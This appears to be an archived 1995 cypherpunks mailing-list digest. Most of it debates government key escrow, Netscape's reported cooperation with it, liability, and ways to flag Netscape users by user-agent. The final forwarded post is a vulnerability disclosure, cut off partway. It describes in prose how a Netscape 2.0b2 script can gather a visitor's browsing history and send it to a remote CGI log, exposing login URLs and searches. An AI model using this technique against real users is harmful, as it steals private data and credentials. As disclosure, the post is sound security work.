>            U.S. GOVERNMENT SEEKS PUBLIC COMMENT ON
>                                
>        DRAFT EXPORT CRITERIA FOR KEY ESCROW ENCRYPTION
>
...
>... The exportability 
>criteria being proposed are for  an expedited licensing review 
>process for software key escrow encryption products with  keys 
>up to 64 bits long.
...

Sounds like they want both GAK and brute force attacks to work.  Perhaps
they are worried that Labour will win in Britain and turn off their access
to the British GAK agent.

Bill Frantz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Sat, 2 Dec 1995 05:18:14 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Netscape gives in to key escrow
Message-ID: <v02120d00ace510ca1c12@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


>I they tell you about it and you buy it anyway -- tough luck.
>
>
>Same with the cars.  Would *you* buy Pinto with explosives in it????
>(leaving aside the "inherently dangerous" argument for the moment on the
>products liability claim).
>
>EBD

Hmm. The key point is that almost no general users will have a clue what
actual security is, and what GAK is. They _might_ understand the risks of
having an explosive in their vehicle (but can just as easily argue it wasn't
properly designed if it went off improperly.) Regardless of what they'd know
about their vehicle, they can easily claim to had the risks associated with
GAK improperly represented, Netscape misleading them with deceptive claims
of security given this potential hole etc.

I'm not saying whether or not this is the case, but we are very much in a
legal period where individuals are in fact expected not to need common sense,
and corporations are responsible for cleaning up after consumer stupidity.

It is certainly true that given the general state of education regarding
crypto, the average consumer can easily say that regardless of warnings about
GAK, that they weren't properly informed of the risk. With all the hype
around security, Netscape and encryption people will be under the
impression regardless
of one little disclaimer tag, that their information is safe. Neither
government nor corporations will disabuse them of this belief. The case
would be strong against them as a consumer.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 2 Dec 1995 02:09:53 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: I Agree buttons, GAKzilla & liability.
In-Reply-To: <Pine.3.89.9512010932.A35746-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.BSF.3.91.951201121744.25297B@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995 s1113645@tesla.cc.uottawa.ca wrote:

> On Fri, 1 Dec 1995, Brian Davis wrote:
> 
> > Well that would depend on the terms of the agreement to hold the escrowed 
> > keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> > write the agreement so that it says, in essence, "we will try really 
> > really hard not to let the keys out, but if they get out, our only 
> > liability if to say 'Ooops' followed by a heartfelt apology!"
> 
> <IANAL>
> This sounds like the fine print you "agree" to by opening commercial software
> packages. Hasn't this been found void in a couple of places? The "OK"  or 


"I agree" that shrinkwrapped licenses are problematic, at best.  I don't 
think the analogy applies, though.  Maybe I'm mixing threads up, but I 
thought the topic was "Why would anyone agree to escrow keys commercially 
-- given the high risk if the keys get out?"

If that is the topic, then the keys would be escrowed by one of two 
parties:  the software developer or the customer.  If the customer does 
it, through an active act on his part, then no problem -- he's expressly 
consented (not a "shrinkwrap license" problem in my view if he send them 
his key ...).

If the software developer gives the key to the C/GAK escrow agent, then 
all that should be necessary is to warn the consumer that there is a 
backdoor through the escrowed key.  Then the consumer can buy the product 
or not, but knows what he is getting so can make a choice.

As long as the escrow aspect is not hidden, I don't see any fraud.  The 
remedy is the marketplace.  It is a long fall from $5,000,000,000 ...

EBD




> "I Agree" buttons I'm forced to press (but you don't *have* to download 
> software, nya,nya,nya...) when downloading wares also comes to mind.
> Has this been tested in a court? (Sega's reverse engineering suit from 
> a while back comes to mind)
> 
> Pressing buttons is hardly the same as your notarized handwritten signature
> on paper (we prefer blood, it's more permanent), or its digital equivalent.
> Mere tokenism, not insurance. 
> </IANAL>
> 
> About JR's concern about Netscape's shareholders, they're playing a bubble
> market and they know it. I wish them all the money and luck; luck is 
> something they're gonna need if this is to go on.
> 
> Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time 
> netscape). 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 2 Dec 1995 02:15:48 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512011533.KAA19471@homeport.org>
Message-ID: <Pine.BSF.3.91.951201122459.25297C@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Adam Shostack wrote:

> Brian Davis wrote:
> 
> | On Thu, 30 Nov 1995, Adam Shostack wrote:
> 
> | > 	One thing that stockholders do care about is liability.  Its
> | > my (non lawyerly) opinion that anyone implementing GAK without a
> | > government mandate to do so is opening themselves up to huge liability
> | > the Clipper database of keys gets out.
> 
> | Well that would depend on the terms of the agreement to hold the escrowed 
> | keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> | write the agreement so that it says, in essence, "we will try really 
> | really hard not to let the keys out, but if they get out, our only 
> | liability if to say 'Ooops' followed by a heartfelt apology!"
> 
> 	I'm not sure thats true.  Allow me to argue by analogy.
> 
> 	A car company, hearing the FBI's laments about cars being used
> as getaway vehicles after bank robberies, starts a program of putting
> explosives in all their cars, with radio detonators.  In an
> unfortunate accident, some of the explosives go off for no reason,
> injuring the owner of the car, etc, etc.  It seems to me that the car
> maker would be quite liable for doing something stupid (putting
> explosives in the engine block), even though they didn't cause the
> explosion.

I'm presuming that the consumer is aware of the key escrow.  It would 
indeed be foolhardy for Netscape to try to hide that, given the liability 
problem and the cypherpunks available to discover the "hidden" escrow.

I they tell you about it and you buy it anyway -- tough luck.


Same with the cars.  Would *you* buy Pinto with explosives in it???? 
(leaving aside the "inherently dangerous" argument for the moment on the 
products liability claim).

EBD




> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 2 Dec 1995 17:11:15 +0800
To: rah@shipwright.com
Subject: Re: GAK, Netscape, CyberDog, and you.
Message-ID: <9512011745.AA21052@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Bob,

Please stop this habit of cross-posting to every mailing list; 999 times
out of a thousand the resultant discussion helps neither list.  And my god,
five lists this time, at least some of which have over a thousand readers?

NB:  Followups redirected.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 03:56:36 +0800
To: cypherpunks@toad.com
Subject: Re: CPunks in the news: St. Jude
Message-ID: <ace491bc0a021004b6c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM 12/1/95, Jim Gillogly wrote:
>Today's (1 Dec 95) LA Times has a writeup on female "hackers", and gives
>several sympathetic column-inches to St. Jude Milhon, a charter Cypherpunk.
>Evidently she has a new book coming out (Girls with Modems?).

I saw a book yesterday along the lines of "Girl Hackers" (or should it be
the Cybernetically Correct "Grrl Hackers"?) I forget the exact title and
author, but it's written in the typically breezy, cut-and-paste style
pioneered by Stewart Brand and Ted Nelson and now apparently the only
acceptable form for anthing connected to the Net.

Interviews with Jude Milhon and Romana Machado (aka "Cypherrella"). (For
more on Romana and her Cypherella personna, see
http://www.best.com/~fqa/romana/)

I didn't buy it, though I did buy the "Cyberpunk's Handbook" a few months
ago. It was co-authored by Jude, with Eric Hughes as the cover model.
Others have reviewed it here recently.

And Jude has another book coming out, something like "How to Mutate and
Take Over the World."

Personally, I find it distasteful--just my opinion, with no aspersions cast
on Jude, Romana, Eric, Robert, etc.--that so much blatant self-promotion is
becoming the norm. (Yes, I know I agreed to be one of the "cover models"
for the issue of "Wired" on "Crypto Rebels," but this was almost 3 years
ago and I think now I wouldn't agree to it--in fact, I've turned down a
dozen requests for interviews recently, feeling the planned interviews were
fluffery and not substantive.)

It seems that the media loves to see the extreme side of people, and
encourages really strange antics and bizare self-labelling. The glut of
Internet magazines ("Wired," "Net Guide," "Infobahn," etc.) and the even
greater glut of pop culture mags with Internet connections ("Raygun,"
"Detail," and a dozen others, mostly with Traci Lords or Sandra Bullock on
their covers) means there must be some appetite for these personality
pieces. And the more outrageous a personna, the more coverage.

(Recall that one Cypherpunk list reader saw the British t.v. show that
covered Cypherpunks and mentioned "a porn star named Cypherella who writhed
on the floor while describing PGP"...I didn't see this show, but I presumed
he was seeing Romana in her "crypto bondage and discipline" outfit. I count
Romana as a friend, though I haven't seen her in a long time, but I
_personally_ am slightly embarassed at this sort of thing...again, no
aspersions cast against her choices in life.)

(I expect this will find its way to Romana--Hi, Romana!--courtesy of her
friends and/or of search engines like Deja News, and I suppose I really
should take this out so as to avoid any hard feelings. But, I guess I
won't. Jude, Romana, Lisa Palac, and all the other "cybergrrls" are just
players in the media fascination with such things. To each their own. I
don't have to buy the books or magazines which extol them, so all is well.)

The "cult of personality" is alive and well in cyberia.

--Tim May, expecting some angry e-mail over the next few weeks


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ali Bahreman <ali@eit.com>
Date: Sat, 2 Dec 1995 06:25:24 +0800
To: daw@CS.Berkeley.EDU
Subject: RE: digital receipts and cash
Message-ID: <199512012117.NAA22727@penetralium.eit.com.>
MIME-Version: 1.0
Content-Type: text/plain


I have a paper on "Certified Electronic Mail" which I feel helps in your
quest to create "digital receipts".  See my home at www.eit.com/~ali for
pointers.  The paper was published at the 1994 ISOC Symposium jointly 
with my thesis advisor, Doug Tygar.

Regards,

Ali




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 2 Dec 1995 03:28:47 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512011842.NAA43335@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Warning: More linguistic than crypto relevance follows.]

Tim wrote:

<snips>

>At 10:45 AM 12/1/95, JR@ns.cnb.uam.es wrote:
>>With regard to all this waving about Netscape giving in to key scrow...
>
>Key _escrow_, though "scrow" is perhaps just as accurate as the
>improperly-named "key escrow"

Indeed. One of the main libertarian objections to the term "key escrow"
is the "it's Newspeak" objection. "Escrow" [from the Hypertext Webster 
Interface at http://c.gp.cs.cmu.edu:5103/prog/webster?escrow ] means:
__________
1. es.crow \'es-.kro-, es-'\ n [MF escroue scroll] 1: a deed, a bond,
money, or a piece of property delivered to a third person to be delivered
                                             ^^^^^^^^^^^^
by him to the grantee only upon the fulfillment of a condition 2: a fund
or deposit designed to serve as an escrow 
2. es.crow \es-'kro-, 'es-.\ vt : to place in escrow 
__________ [emphasis added.]

The number of cases that begin: "US v. ___," or that end: "___ v. US,"
puts the lie to the idea that the government could somehow be *any
sort* of a "third person" in many of the cases that come before the
(government employees, albeit with some autonomy, known as) judges.
Mine is, of course, the libertarian view of "the government as one
giant blob," as opposed to various contrary views of "the government
as many wonderful-but-separate agencies who are all just trying to
do their best." My view, while certainly not the majority view, is
pervasive enough that [IMO] the current government terminology of
"key escrow" *should* change to a less Orwellian term.

> (hint: escrow is something done voluntarily, not the situation here
> with GAK).

I liked the term "FUCKED" better, but I guess I can settle for "GAK."
JMR

Regards, Jim Ray --  http://www.shopmiami.com/prs/jimray

Al Gore's mission is to reinvent government. He seems to have started
with the office of the vice president. His staff is 48 percent larger
than Dan Quayle's was. -- Reason "Brickbats" October, 1995 issue.

- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
- -----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBML9Lp21lp8bpvW01AQENGQP/XDh27QPgG/XkyYEHA255ij7fV1yrGKnO
iGlWPFEzEnewoBWcJChIjDA4jTDJFiGT2D6VlEG8V8OyFPoHmdYPhkDGbIixjHE+
ZZMrWrzmbgiijLU9+Fp4Ib3cQibeefQY1HpmZ3wGd/3mLpu5gCtU8t3/Xx5PcZSF
ueAU57DmJO8=
=zVa0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 07:04:09 +0800
To: perry@piermont.com
Subject: Re: Barring access to Netscape
In-Reply-To: <199512012028.PAA08954@jekyll.piermont.com>
Message-ID: <199512012157.NAA00703@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> You can get your server to simply put that at the top of every page
> served to a Netscape client, followed by a horizontal line and the
> normal web page. It should be easy to put together the hacks to do
> that and get them out to lots of people. Watch how fast people would
> switch from Netscape, especially were it widely deployed. You would
> then watch a fast fall in Netscape stock, which would likely piss Jim
> Clark off far more than anything else one could do.
> 

	Perry's suggestion has my vote, and will be implemented at
c2.org when lance puts up his page.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Sat, 2 Dec 1995 08:27:43 +0800
To: cypherpunks@toad.com
Subject: The ecash protocol (for real)
Message-ID: <199512012218.OAA20007@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Well, they did it.  Probably quite a few people are sending something
to this effect to CP right now, and we're crossing paths.

Check out http://www.digicash.com/ecash/protpublish.html.

Analysis is forthcoming (I'll probably have something useful to say
by the December Bay Area meeting...).

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 2 Dec 1995 03:56:01 +0800
To: ecarp@netcom.com
Subject: Re: Barring access to Netscape
Message-ID: <v02130500ace47ad3fce4@[165.254.158.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:32 12/1/95, Ed Carp wrote:

>If you want to bar access to your site from a Netscape browser, such
>can easily be accomplished.  If memory serves, every browser, when
>connecting to a site, exchanges certain information about the client
>with the server.  One can gain access easily to that information.
>
>I believe that Netscape uses "Mozilla" as their keyword when
>exchanging browser-specific information.

If you want to see one way of locking out Netscape users, check out this
URL which points at a Web Page that will not allow access by Netscape Users
(the guy is ticked off at them trying to establish their own standards) -


http://www.ccs.neu.edu/home/ratinox/angels/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 04:59:31 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: WTO an even worse possibility as Inet regulator.
In-Reply-To: <Pine.BSD.3.91.951201050752.28674C-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SUN.3.91.951201142329.26674E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Oh dear.  First off, it's the "Royal Institute of International Affairs"

Second, I haven't read or seen the report although I ordered it yesterday.

Third....<disclosure>...I am a Foreign Associate of RIIA...</disclosure>. 
They do nice seminars in a nice part of London near where I once worked.

Fourth, RIIA is a think tank, that is part of the UK establishment but not
part of the government, much like Brookings, Hoover Institution, Council
on Foreign Relations, are in the U.S.  It doesn't speak for the UK
government, and sometimes criticizes it (usually politely).  It doesn't
necessarily speak for business, although it certainly speaks *to* it and 
about it.

Fifth, that doesn't mean the report is right.  Or necessarily influential.
RIIA issues lots of reports, several a month, and most sink without a
visible trace.  But some don't.  So, it could be influential.  Especially
in the UK.  Depends how good/scary it is. I'll report if my copy ever gets
here.  With the Xmas mails, I figure January at best. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Sat, 2 Dec 1995 05:42:33 +0800
To: cypherpunks@toad.com
Subject: nsa and netscape (fwd)
Message-ID: <m0tLc8O-00057cC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>

> 
>   The following came from a government source. I thought it might be of
>   interest. 
>                        Bob
> --------------------------------------------------------------------------
> 
>      At yesterdays FNC  (Federal Networking Council) meeting it was 
>      mentioned in passing that NSA has given Netscape a grant of $5 Million 
>      (yes $5M) to beef up the security features of Netscape. More info will 
>      be forthcoming on this.
> 

I found my way to http://www.fnc.gov, but the most recent documents
that they had online were about three weeks old. 

I, too, am curious what the source for this was.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Sat, 2 Dec 1995 08:33:58 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Netscape gives in to key escrow
Message-ID: <v02120d02ace53224f233@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain



>And thus we return to my original point, which is that it will depend on
>what is said/disclosed.  If every copy of GAKscape had a banner, bigger
>than the Netscape "N" which said, "The government can read every message
>you send using this software no matter what you do" then I think
>consumers will be hard pressed to say they weren't warned.

I don't mean to be inflamatory, but it isn't much of a point. They aren't
going to put such a banner up because that would limit their business. The
goal of Netscape (though I don't single them out), any corporation that would
profit from business of those who seek encryption while still allowing GAK,
and the government, is to limit the public's awareness of the size of the
hole. If they let people know the extent of the hole, then they'll use
products w/out it which blows profits from companies involved, and doesn't
benefit the government who want it in common use.

>I disagree.  Almost nobody read the fine print on the back of a note you
>sign when you buy a car or otherwise take out a loan, but the provisions
>are generally enforceable ...  Ignorance is not necessarily an excuse.

The question is whether there was false representation of the security of
the product.
1. The general knowledge of encryption and secure electronic financial
transactions is significantly lower than that of more standard
transactions.

2. Applying for a loan or buying a car involve actively going out, negotiating,
signing contracts, etc. It will be much simpler to simply stick your vital
info into a 'secure' browser.

3. The choice of browser to use will be done, based on representations by
companies about the security of their product. If Netscape doesn't
explicitly
state in direct terms when accessing the browser that the GAK is a
potential security risk, then they will be sued. Simply because someone
will get blamed.

Since they (or again any company that incorporates GAK.. I really don't
want to target Netscape in specific) will make the threat sound as
insignificant as possible, and not bring it to people's attention (and they
can't afford to do so) when (not if) it is breached they will be taken to
court repeatedly.

>
>EBD

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Sat, 2 Dec 1995 04:26:40 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <9512011943.AA29646@bksss1.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If Alice is so afraid of using PGP, then he's sending his messages through
the remailer chain unencrypted (if it even goes through a chain).  In that
case, the FIRST remailer knows who Alice is... it sees his message, the final
destination, and Alice's real address.

rgds-- TA  (tallard@frb.gov)                                            +-+
I don't speak for the Federal Reserve Board, it doesn't speak for me.   |X|
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D       +-+
              

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBML9awKAudFplx0TNAQFUZAQAqjrSOlgy7erUi8eDqdWUNkuVgDBLiJk8
dkxaiTU4pbw+hpQzfydMipxJi3VxVuDiL54k7jEM8NoTPFZTQWPB1NuzOGIvBHPy
FvxX3ojlk53/1ZYJBQaoy5eiYaGpyS/KgmLI0XCitT4h3LHNcVk6UrM7PQNURLWK
DETslOeBykM=
=A3Vf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Sat, 2 Dec 1995 05:57:23 +0800
To: cypherpunks@toad.com
Subject: Updated lists
Message-ID: <199512012043.OAA00733@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For those of you that use the Mixmaster type2.list and pubring.mix
from vishnu.alias.net for your mixmaster clients, I have just made
some changes to these files on vishnu. You may want to update
accordingly.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML9o2lOTpEThrthvAQGCTgP9F0kt6INVXFMZVg1Q+/yyoukhg8BJF8M7
PnGr8XoO0nc8oLWcNbQSG66oXQuDESNhMg6+/MoZzcmT6NKral1Gr7KCRqDuYX+/
O6JMmipO0NSqKwn7HPkDi7HSEc0g5gGsdp53y+3OXYi+KrYLcDjs5ov22D0ryTun
jfksXFfEBrw=
=cdZU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 2 Dec 1995 09:03:23 +0800
To: cypherpunks@toad.com
Subject: Re: Aware's radiation detector
In-Reply-To: <Pine.3.89.9512011612.A29760-0100000@tesla.cc.uottawa.ca>
Message-ID: <199512012258.OAA17955@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> This month's Scientific American has an ad by Aware for that serial port
> radiation detector we were discussing a while back. Upper right corner
> of page 109, I think. Sells for $149 US, 45 day money back guaranty.

This wouldn't be the wavelet company in Cambridge, MA, would it?

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Sat, 2 Dec 1995 04:54:07 +0800
To: cypherpunks@toad.com
Subject: available news/mail filtering
Message-ID: <199512012001.PAA01825@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


What news and mail filter programs are available?  Pointers
will be appreciated.

If inclined, please give some pros/cons of your favorites.

Thank you for your help in this matter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Sat, 2 Dec 1995 05:16:45 +0800
To: "'cypherpunks@toad.com>
Subject: Browser Reports
Message-ID: <01BABFFE.EE4F9020@loki>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft's Browser (my choice right now) reports:

If you want to know what yours reports, check out http://www.sanchez.com/tt.htp
 
Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Sat, 2 Dec 1995 05:18:55 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512012016.PAA26079@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Dec 1995, Ed Carp wrote:

> I believe that Netscape uses "Mozilla" as their keyword when 
> exchanging browser-specific information.

An interesting side-effect:

It seems that the Microsoft browser also sends "Mozilla".
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBML9iryoZzwIn1bdtAQHrkwF5AQ/6ldj1MG7JA05l7wOJw5MebvCvGEok
zTfJg30NjNK8MLStXz2fGuDhMMs2ZIHJ
=VVSJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Dec 1995 05:37:00 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
In-Reply-To: <199512012008.MAA01222@netcom23.netcom.com>
Message-ID: <199512012028.PAA08954@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> (2) You want to inform the public and put pressure on Netscape, not piss
> off the people using netscape browsers.  A quick, one page, detour would
> seem appropriate, but not denial of access or other hostile acts.

I favor putting a GIF and text on the top of every page saying 

  BIG BROTHER INSIDE YOUR BROWSER [Insert nasty logo here.]  You are
  apparently using Netscape, the browser that intentionally lets
  people tap your communications. For more information, click
  _here_. To download a better browser now that doesn't have Big
  Brother Inside, click _here_. To send e-mail to the CEO of Netscape
  telling him how upset this makes you, click _here_.

You can get your server to simply put that at the top of every page
served to a Netscape client, followed by a horizontal line and the
normal web page. It should be easy to put together the hacks to do
that and get them out to lots of people. Watch how fast people would
switch from Netscape, especially were it widely deployed. You would
then watch a fast fall in Netscape stock, which would likely piss Jim
Clark off far more than anything else one could do.

We need HTML 3.0 capable browsers for all platforms, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Sat, 2 Dec 1995 05:57:25 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: [NOISE] Barring access to Netscape
Message-ID: <199512012041.PAA29577@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote:
>If you want to see one way of locking out Netscape users, check out this
>URL which points at a Web Page that will not allow access by Netscape Users

Just a personal note... while I am strongly in favour of security, this
seems rather petulant and knee-jerkish.

JeffW: Please add a configuration option to let users override the "Mozilla"
ident, so that they can continue to use Netscape at all sites.  I personally
won't use the override, though; if a site is going to insist on trying to
frivolously exlude me as a user based on nothing but the browser I choose to
use, they aren't serious anyway.

>(the guy is ticked off at them trying to establish their own standards) -

The _market_ establishes standards (been proven time and time again).  His
reaction sounds pretty childish to me, but YMMV...

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graeme Cross <graeme@chem2.chem.swin.edu.au>
Date: Fri, 1 Dec 1995 14:46:37 +0800
To: cypherpunks@toad.com
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Talking of Netscape - this posting prompted me to forward it given the 
security and privacy implications inherent in the problem.

Cheers
Graeme

------- Start of forwarded message -------
>From: Scott Weston <scott@tripleg.com.au>
>Subject: Netscape 2.0b2 allows for invasion of privacy
>Newsgroups: aus.net.announce,comp.privacy
>Date: Fri, 01 Dec 1995 11:09:06 +1100

Hi 'Net Dwellers,

First off - I've posted this before (however not to this group) and only
got a response from the Netscape Corp.  They were glad I found the
problem and said that they would fix it, however I feel that people
should know about it.  Also I would like people to help me spread this
document around, i.e. if you know of a newsgroup (or people) that would
find this interesting then please re-postit.

On with the problem...

I've recently got hold of the latest netscape, and was (at first) very
excited about the new "LiveScripts" that it supports.  If people don't
yet know - these "LiveScripts" allow you to put small programs into your
web page that is then executed by the Netscape client.  There is no
DIRECT way for these programs to send information back to the owner of
the web page, however I was able to do it in a not-so-direct way.

The "LiveScript" that I wrote extracts ALL the history of the current
netscape window.  By history I mean ALL the pages that you have visited
to get to my page, it then generates a string of these and forces the
Netscape client to load a URL that is a CGI script with the QUERY_STRING
set to the users History.  The CGI script then adds this information
to a log file.  Now if this hasn't quite CLICKED yet lets do a little
example.

Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
to start his daily "surf" session.  First he decides to check his CD-NOW
purchase and uses the handy Auto-Login URL.  Then he decides to go to
Lycos and do a search.  In his search he find my page, which he decides
to visit.  Suddenly he is transported, not to my main page but to one
of my CGI scripts, which in turn happens to have ALL the URL's he just
been to in it.  This means that in my log will be:

  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
    username and password.
  - The exact search params he used on Lycos (i.e. exactly what he
    searched for)
